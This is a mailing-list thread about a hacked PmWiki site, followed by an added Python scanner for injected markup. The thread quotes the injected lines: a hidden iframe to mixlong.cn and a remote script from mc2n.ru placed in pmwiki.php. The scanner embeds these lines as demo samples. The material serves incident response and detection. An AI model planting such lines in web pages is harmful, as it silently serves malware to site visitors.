- Configuration file is set to allow upload of gif, jpeg, jpg, png, htm and html files. I've had a look in the upload directories - and for the moment I could not find anything suspicious.
- Include markup is not used.

The pmWiki.php-file is infected with this line:

$HTMLEndFmt = "\n<script src=http://www.mc2n.ru/script.js></script></body>\n</html>";

I don't know how this works, but it seems to write this at the end of many html and asp files at the site.

2008/9/3 Greg T. Grimes <[EMAIL PROTECTED]>:
>
> Are these files writeable by the web server? Do you allow uploads to your
> site? Standard security practice says not to allow the web server write
> access to any files on your system. This is especially true for your
> webpages. If you do allow uploads you might want to check your upload
> directory for files that could be used to gain access to your server.
> c99shell is an example. Another thing to look for are file include
> vulnerabilities. For example, if you take input for a form and then use
> that input to include a certain file based on the input this can be used to
> launch scripts that aren't even hosted on your server. I'm currently not
> aware of any File Include Vulns in pmwiki. Just a quick look at the code
> and I don't see any obvious ones.
>
> On Wed, 3 Sep 2008, Erik Haagensen wrote:
>
>> Our site has been hacked several times during the last month.
>> It has been cleaned and checked by Site Analyzer - all ok.
>> After some days we have problems again.
>>
>> The index.php (and several other files) contains this now:
>>
>> <?php include('pmwiki.php');
>> <iframe src="http://mixlong.cn/in/" width=0 height=0
>> frameborder=0></iframe>
>>
>>
>>
>> I don't know what more to do to avoid these problems.
>>
>> --
>> Best regards
>> Erik Haagensen
>> Oslia
>> NO-2550 Os i Østerdalen
>>
>
> --
> Greg T. Grimes
> Network Analyst
> ITS -- Network Services
> Mississippi State University

--
Best regards
Erik Haagensen
Oslia
NO-2550 Os i Østerdalen
tel: +47 62497332 / 94430332
www.bokbinding.no
www.haagensen.no/erik
N62.50439 E11.17562

_______________________________________________
pmwiki-users mailing list
[email protected]
http://www.pmichaud.com/mailman/listinfo/pmwiki-users
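
Added example, not part of the original thread and not PmWiki code: a Python sketch that walks a web root and flags files writable by group or other users, plus the two injection shapes quoted above (a zero-size iframe and a script tag loaded from a remote host). The regexes, the extension list and the function names are assumptions of this example; the sample files in demo() are constructed from the snippets quoted in the thread.

```python
import re
import stat
import tempfile
from pathlib import Path

# Heuristic patterns (assumptions of this example) for the injections quoted above.
HIDDEN_IFRAME = re.compile(r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0\b', re.I)
REMOTE_SCRIPT = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)
WEB_EXTS = {".php", ".htm", ".html", ".asp"}

def scan_file(path, allowed_hosts=frozenset()):
    """Return findings for one pathlib.Path: loose permissions, injected markup."""
    findings = []
    if path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group/world-writable")
    text = path.read_text(encoding="utf-8", errors="replace")
    if HIDDEN_IFRAME.search(text):
        findings.append("zero-size iframe")
    for host in sorted(set(REMOTE_SCRIPT.findall(text))):
        if host.lower() not in allowed_hosts:
            findings.append("remote script from " + host)
    return findings

def scan_tree(root, allowed_hosts=frozenset()):
    """Return {relative path: findings} for flagged web files under root."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            if found := scan_file(path, allowed_hosts):
                report[str(path.relative_to(root))] = found
    return report

def demo():
    """Scan a constructed web root holding the two snippets from the thread."""
    samples = {  # constructed files: name -> (content, permission bits)
        "index.php": ("<?php include('pmwiki.php');\n<iframe src=\"http://mixlong.cn/in/\""
                      " width=0 height=0\nframeborder=0></iframe>\n", 0o666),
        "pmwiki.php": (r'$HTMLEndFmt = "\n<script src=http://www.mc2n.ru/'
                       r'script.js></script></body>\n</html>";', 0o644),
        "clean.html": ("<html><body>ok</body></html>\n", 0o644),
    }
    with tempfile.TemporaryDirectory() as root:
        for name, (content, mode) in samples.items():
            path = Path(root, name)
            path.write_text(content, encoding="utf-8")
            path.chmod(mode)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Hosts a site legitimately loads scripts from go in allowed_hosts; the permission check uses POSIX mode bits, so it says nothing about ACLs or about files owned by the web server's own account.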
